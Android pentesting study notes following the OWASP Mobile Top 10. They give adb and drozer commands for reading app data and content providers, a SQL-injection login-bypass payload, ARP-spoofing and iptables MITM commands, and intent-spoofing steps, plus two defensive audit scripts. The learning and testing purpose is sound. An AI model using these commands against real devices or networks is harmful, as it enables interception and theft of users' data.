Android Pentest Cheatsheet


These are the notes that I took while I was learning Android pentesting. Will update with some methodology soon!


Applications

  • Home
  • Dialer
  • SMS/MMS
  • IM
  • Browser
  • Camera
  • Alarm
  • Calculator
  • Contacts
  • Voice Dial
  • Email
  • Calendar
  • Media Player
  • Photo Album
  • Clock


Application Framework

  • Activity Manager
  • Window Manager
  • Content Providers
  • View System
  • Notification Manager
  • Package Manager
  • Telephony Manager
  • Resource Manager
  • Location Manager


Libraries

  • Surface Manager
  • Media Framework
  • SQLite
  • WebKit
  • libc
  • OpenGL ES
  • Audio Manager
  • FreeType
  • SSL

Hardware Abstraction Layer

  • Graphics
  • Audio
  • Camera
  • Bluetooth
  • GPS
  • Radio (RIL)
  • Wi-Fi

Linux Kernel

  • Display Driver
  • Camera Driver
  • Bluetooth Driver
  • Shared Memory Driver
  • Binder(IPC) Driver
  • USB Driver
  • Kernel Driver
  • Wi-Fi Driver
  • Audio Drivers
  • Power Management

Common Mobile Application Functions

  • Online Banking (Barclays)
  • Shopping (Amazon)
  • Social Network (Facebook)
  • Streaming (Sky Go)
  • Gambling (Betfair)
  • Instant Messaging (WhatsApp)
  • Voice Chat (Skype)
  • Email (Gmail)
  • File Sharing (Dropbox)
  • Games (Angry Birds)

Document storage applications allowing users to access sensitive business documents on demand.

Travel and expenses applications allowing users to create, store and upload expenses to an internal system.

HR applications allowing users to access payroll, timesheets, payslips, holiday information and other sensitive functionality.

Internal service applications, such as mobile applications that have been optimized to provide access to an internal resource such as the corporate intranet.

Internal instant messaging applications allowing users to chat in real time with other users regardless of location.

Client Side Vulnerability

Insecure data storage

This category of vulnerability incorporates the various defects that lead to an application storing data on the mobile device in cleartext or in an obfuscated format, using a hard-coded key, or by any other means that can be trivially reversed by an attacker.

Insecure transmission of data

This involves any instance whereby an application does not use transport layer encryption to protect data in transit. It also includes cases where transport layer encryption is used but has been implemented in an insecure manner.

Lack of binary protections

This flaw means that an application does not employ any form of protection mechanism to complicate reverse engineering, malicious tampering or debugging.

Client-Side Injection

This category of vulnerability describes scenarios where untrusted data is sent to an application and handled in an unsafe manner. Typical origins of injection include other applications on the device and input populated into the application from the server.

Hard-coded password keys

This flaw arises when the developer embeds a sensitive piece of information, such as a password or an encryption key, into the application.

Leakage of sensitive data

This involves cases where an application unintentionally leaks sensitive data through a side channel. It specifically includes data leakage that arises through the use of a framework or the OS and occurs without the developer’s knowledge.

OWASP Mobile Top 10 risks from 2014

  • M1 – Weak Server-Side Control
  • M2 – Insecure Data Storage
  • M3 – Insufficient Transport Layer Protection
  • M4 – Unintended Data Leakage
  • M5 – Poor Authorization and Authentication
  • M6 – Broken Cryptography
  • M7 – Client Side Injection
  • M8 – Security Decisions via untrusted input
  • M9 – Improper session handling
  • M10 – Lack of Binary Protections

OWASP Mobile Top 10 risks from 2016

  • M1 – Improper Platform Usage
  • M2 – Insecure Data Storage
  • M3 – Insecure Communication
  • M4 – Insecure Authentication
  • M5 – Insufficient Cryptography
  • M6 – Insecure Authorization
  • M7 – Client Code Quality
  • M8 – Code Tampering
  • M9 – Reverse Engineering
  • M10 – Extraneous Functionality

OWASP Top 10 mobile security tools

  • iMAS – Created by the MITRE Corporation, this project is an open source secure application framework for iOS
  • GoatDroid – self‐contained training environment for Android applications
  • iGoat – Similar to the GoatDroid project, for iOS
  • Damn Vulnerable iOS App
  • MobiSec
  • Androick

Browser-based applications – The term describes applications that are usually a “mobile friendly” clone of the main site and loaded via the device’s browser.

Hybrid applications – The term refers to mobile applications that are a native wrapper around a WebView and often use a framework to access native device functionality.

Application Sandboxing

Each app runs inside its own sandbox.
One app cannot access the data associated with other apps.
/data/data/ is the directory where all app data is located.

Connecting to adb with BlueStacks

adb connect localhost:5555
adb -s emulator-5554 shell

Start Learning OWASP Top 10 from 2014

M2-Insecure Data Storage

Android provides various ways to save app data.

It is up to the developer what kind of data is stored, how much, and where:

  • SharedPreferences
  • SQLite Databases
  • Internal Storage
  • External Storage
  • Using network connection


Saving a username and password without encryption is not safe:

OnePlus3T:/data/data/ # cat userdetails.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">ist</string>
    <string name="password">ist</string>
</map>
OnePlus3T:/data/data/ #
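Added example (not from the original notes): a small Python audit script that parses SharedPreferences XML such as the userdetails.xml dump above and flags keys with credential-like names that hold a non-empty cleartext value. The sample XML is constructed to mirror the dump; the key-name pattern and the assumption that the app's shared_prefs directory was first pulled with `adb pull` are mine.

```python
"""Audit pulled SharedPreferences XML files for cleartext credentials.

Added example, not part of the original notes. Assumes the app's
shared_prefs directory has already been pulled, e.g.
    adb pull /data/data/<package>/shared_prefs ./shared_prefs
"""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Key names that commonly hold secrets (case-insensitive substring match).
# This list is an assumption; extend it for the app under test.
SENSITIVE_KEY_PATTERN = re.compile(
    r"pass(word|wd)?|pwd|secret|token|api[_-]?key|session|auth|pin|credit|card",
    re.IGNORECASE,
)

# Constructed sample mirroring the userdetails.xml dump in the notes,
# plus two extra entries to exercise the non-string and token cases.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">ist</string>
    <string name="password">ist</string>
    <boolean name="remember_me" value="true" />
    <string name="auth_token">eyJhbGciOiJIUzI1NiJ9.constructed.sample</string>
</map>
"""


def find_cleartext_secrets(xml_text):
    """Return (key, value) pairs whose key looks sensitive and whose value is non-empty.

    SharedPreferences stores <string> values as element text and every other
    type (boolean/int/long/float) in a 'value' attribute; both are handled.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root:
        key = elem.get("name", "")
        value = elem.text if elem.tag == "string" else elem.get("value")
        if value and SENSITIVE_KEY_PATTERN.search(key):
            findings.append((key, value))
    return findings


def audit_prefs_dir(directory):
    """Scan every *.xml under a pulled shared_prefs directory; map file -> findings."""
    report = {}
    for path in sorted(Path(directory).glob("*.xml")):
        hits = find_cleartext_secrets(path.read_text(encoding="utf-8"))
        if hits:
            report[path.name] = hits
    return report


if __name__ == "__main__":
    for key, value in find_cleartext_secrets(SAMPLE_PREFS):
        print(f"cleartext secret in key {key!r}: {value!r}")
```

Run it over a pulled directory with `audit_prefs_dir("./shared_prefs")`. Any hit means the app writes secrets to its private storage in cleartext, where a rooted device, a backup, or another app exploiting a path traversal can read them; the app-side fix is to keep credentials out of SharedPreferences (use a server-issued short-lived token and the Android Keystore) rather than to obfuscate them.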

SQLite databases

Pulling a database file from the device via adb:

adb shell "su -c cat /data/data/" > SQLINJECTION.db

M3-Insufficient Transport Layer Protection

It is pretty common to exchange data between the client and server.
Many apps do not use SSL/TLS for transmitting data.
Many apps trust self-signed certificates.
It is recommended to use certificates signed by a trusted CA.
An attacker may eavesdrop to obtain sensitive data.

There are many possible attack scenarios. Below are a few of them:

  • MITM with Burp Suite – Intercepting HTTP Traffic
  • MITM with Burp Suite – Intercepting SSL Traffic
  • Real world MITM attacks with ARP spoofing
  • Passive data analysis with tcpdump and Wireshark

MITM with Burp Suite – Intercepting HTTP Traffic

Configure the proxy server for BlueStacks.

cd to the BlueStacks folder:

C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe set 8080 connect to specified proxy
C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe reset                   reset/stop using proxy

Vulnerable URL –
SQLi payload:

x' or 'x'='x

MITM with Burp Suite – Intercepting SSL Traffic

Same setup as above, plus installing Burp's CA certificate on the device so that the app accepts the proxy's certificates.

Real World MITM attacks with ARP spoofing

sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

sudo -l <listenPort>

sudo arpspoof -i <interface> -t <targetip> <gateway>

M4-Unintended Data Leakage

When an application processes sensitive information taken as input from the user or any other source, it may end up placing that data in an insecure location on the device. This insecure location could be accessible to other malicious apps running on the same device, thus leaving the device in a serious risk state.

  • URL caching (both request and response)
  • Keyboard Press Caching
  • Copy/Paste Buffer Caching
  • Application backgrounding
  • Logging
  • HTML5 data storage
  • Browser cookie objects
  • Analytics data sent to third parties

Unintended Data Leakage — Reading the clipboard

The app pastes whatever the user has copied from anywhere, so anything left in the clipboard (including passwords copied from another app) is available to it.

That is the problem.

Unintended Data Leakage — Logging

Using logcat via adb:

adb logcat | grep password

M5-Poor Authentication and Authorization

It has various forms of attack vectors.

Due to offline usage requirements, mobile apps may be required to perform local authentication or authorization checks within the mobile app’s code.

However, it is always recommended to do all such processing on the server side and then load the data onto the mobile device.

Due to usability requirements, mobile apps allow for passwords that are only 4 digits long.

These can easily be brute-forced.

Even if the passwords are stored as hashes on the server, an attacker can easily crack them using rainbow table attacks if the file where hashes are stored is compromised.

M6-Broken Cryptography

The mobile app uses encryption and decryption that is fundamentally flawed and can be exploited by an adversary to decrypt sensitive data.

Poor key management processes

Including the keys in the same attacker-readable directory as the encrypted content.

Avoid the use of hardcoded keys within the binary.

Creating custom encryption protocols

Use apktool to decompile the app and check the source for hard-coded keys or any hash that can be cracked. If such material is found, the app is vulnerable to broken cryptography.

M7-Clientside Attack — SQL Injection at Client Side

x' or 'x'='x

This payload can easily bypass the login without a valid username and password.

M7-Frame Injection in webviews

<iframe src="">

M8-Security Decisions via untrusted inputs — Intent Spoofing

The mobile application can accept data from all kinds of sources.
am – activity manager
If the activity is exported (android:exported="true"), any app on the device can launch it directly:

am start -n

M9-Improper Session Handling

Session-related attacks come into the picture if the session ID is compromised or not invalidated properly in the backend, if tokens are created insecurely, or if session timeouts are not implemented properly.

M10-Lack of Binary Protections

Reversing Android apps with apktool
Reversing Android apps with dex2jar
Exploiting debuggable apps using JDB

Setting Up Drozer

Drozer is a framework for Android security assessments developed by MWR Labs.

Drozer allows you to assume the role of an Android app and to interact with other apps through Android’s Inter-Process Communication (IPC) mechanism and the underlying operating system.

It has useful modules, for example for finding leaking content providers, SQL injection and LFI.
Set up port forwarding and connect:

adb -s emulator-5554 forward tcp:31415 tcp:31415
drozer console connect

Getting the list of all modules in drozer

dz> list

Getting the list of all packages installed

run app.package.list

To filter for a specific package:

run app.package.list -f challenge1

Getting package information

run -a [package name]
dz> run -a
  Application Label: Challenge1
  Process Name:
  Version: 1.0
  Data Directory: /data/user/0/
  APK Path: /data/app/
  UID: 10059
  GID: []
  Shared Libraries: null
  Shared User ID: null
  Uses Permissions:
  - None
  Defines Permissions:
  - None

Finding out the attack surface

run app.package.attacksurface [package name]
dz> run app.package.attacksurface
Attack Surface:
  2 activities exported
  0 broadcast receivers exported
  0 content providers exported
  0 services exported
    is debuggable
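Added example (not from the original notes and not part of drozer): a Python script that derives the same attack surface summary from a decoded AndroidManifest.xml, so the exported components can be checked from the APK alone, for example in a CI pipeline. It assumes the manifest was decoded to plain XML with `apktool d app.apk`; the manifest below is constructed for illustration. It applies Android's export rules: an explicit android:exported attribute wins, otherwise a component with an <intent-filter> is implicitly exported, and a provider with no attribute is exported by default only when the target SDK is 16 or lower.

```python
"""Compute an app's IPC attack surface from a decoded AndroidManifest.xml.

Added example, not part of the original notes or of drozer. Assumes the
manifest is plain XML (apktool d app.apk); the sample is constructed.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "receiver", "provider", "service")
LABELS = {
    "activity": "activities",
    "receiver": "broadcast receivers",
    "provider": "content providers",
    "service": "services",
}

# Constructed sample: one implicitly exported activity (launcher intent-filter),
# one explicitly exported activity, one private activity, an exported receiver,
# an exported provider and a service that opts out despite its intent-filter.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed">
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="true"/>
    <activity android:name=".InternalActivity"/>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <provider android:name=".UserProvider"
              android:authorities="com.example.constructed.users"
              android:exported="true"/>
    <service android:name=".SyncService" android:exported="false">
      <intent-filter><action android:name="com.example.SYNC"/></intent-filter>
    </service>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def is_exported(component, tag, target_sdk):
    """Apply Android's export rules to one manifest component."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if tag == "provider":
        return target_sdk <= 16  # legacy default for providers
    return component.find("intent-filter") is not None  # implicit export


def attack_surface(xml_text, target_sdk=None):
    """Return {tag: [exported component names], 'debuggable': bool}.

    target_sdk is read from <uses-sdk> when present; if neither is available
    a modern target (30) is assumed, which only affects attribute-less providers.
    """
    root = ET.fromstring(xml_text)
    app = root.find("application")
    if target_sdk is None:
        uses_sdk = root.find("uses-sdk")
        target_sdk = int(_attr(uses_sdk, "targetSdkVersion") or 30) if uses_sdk is not None else 30
    surface = {tag: [] for tag in COMPONENT_TAGS}
    for tag in COMPONENT_TAGS:
        for comp in app.findall(tag):
            if is_exported(comp, tag, target_sdk):
                surface[tag].append(_attr(comp, "name"))
    surface["debuggable"] = (_attr(app, "debuggable") or "false").lower() == "true"
    return surface


def format_report(surface):
    """Render the summary in the same shape as drozer's app.package.attacksurface."""
    lines = ["Attack Surface:"]
    for tag in COMPONENT_TAGS:
        lines.append(f"  {len(surface[tag])} {LABELS[tag]} exported")
    if surface["debuggable"]:
        lines.append("    is debuggable")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(attack_surface(SAMPLE_MANIFEST)))
```

The exported component names, not just the counts, are what a reviewer needs: every name in the list is reachable from any other app on the device without a permission, so each one should either be intentionally public or carry an android:permission. The debuggable flag is reported alongside because a debuggable release build lets any local process attach with JDB, as the M10 section notes.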

Listing out activities in a package

run -a [packagename]

Finding the content providers of a package

run scanner.provider.finduris -a [packagename]

Querying content providers

run app.provider.query [URI]

Inserting data into content providers

run app.provider.insert [URI] [-type] column name [value]

Intent Spoofing with drozer

First check the activity's permissions, then launch the activity directly:

dz> run -a
    Permission: null
    Permission: null
dz> run app.activity.start --component

Exploiting Content Provider Leakage

Listing out activities in a package

run -a [package name]

Finding the secret content providers of a package.

run scanner.provider.finduris -a [package name]
run app.package.list -f vul
dz> run app.package.attacksurface com.androidpentesting.vulcontentprovider
Attack Surface:
  1 activities exported
  0 broadcast receivers exported
  1 content providers exported
  0 services exported
    is debuggable
dz> run scanner.provider.finduris -a com.androidpentesting.vulcontentprovider
Scanning com.androidpentesting.vulcontentprovider...
Able to Query    content://
Able to Query    content://
Able to Query    content://
Able to Query    content://

Accessible content URIs:
dz> run app.provider.query content://
| id | name | bankdetails |
| 1  | ch4n | ch4n        |
OnePlus3T:/ $ content query --uri content://
Row: 0 id=1, name=ch4n, bankdetails=ch4n
OnePlus3T:/ $

SQL Injection Content Provider

dz> run scanner.provider.injection --uri content://
Not Vulnerable:
  No non-vulnerable URIs found.

Injection in Projection:

Injection in Selection:

Check whether the selection is injectable by sending a single quote; a database error that echoes the query means the input reaches the SQL unescaped:

dz> run app.provider.query content:// --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM users WHERE (')
dz> run app.provider.query content://
| id | name | bankdetails |
| 1  | ch4n | ch4n        |


Reversing App


Firebase Database Takeover Vulnerability



I highly recommend checking this one out. It is free and super cool.


  • adb
  • JD-GUI
  • Frida
  • drozer
  • dex2jar
  • apktool
  • SQLite Browser
  • MobSF



Hackerone Android Report And Resources
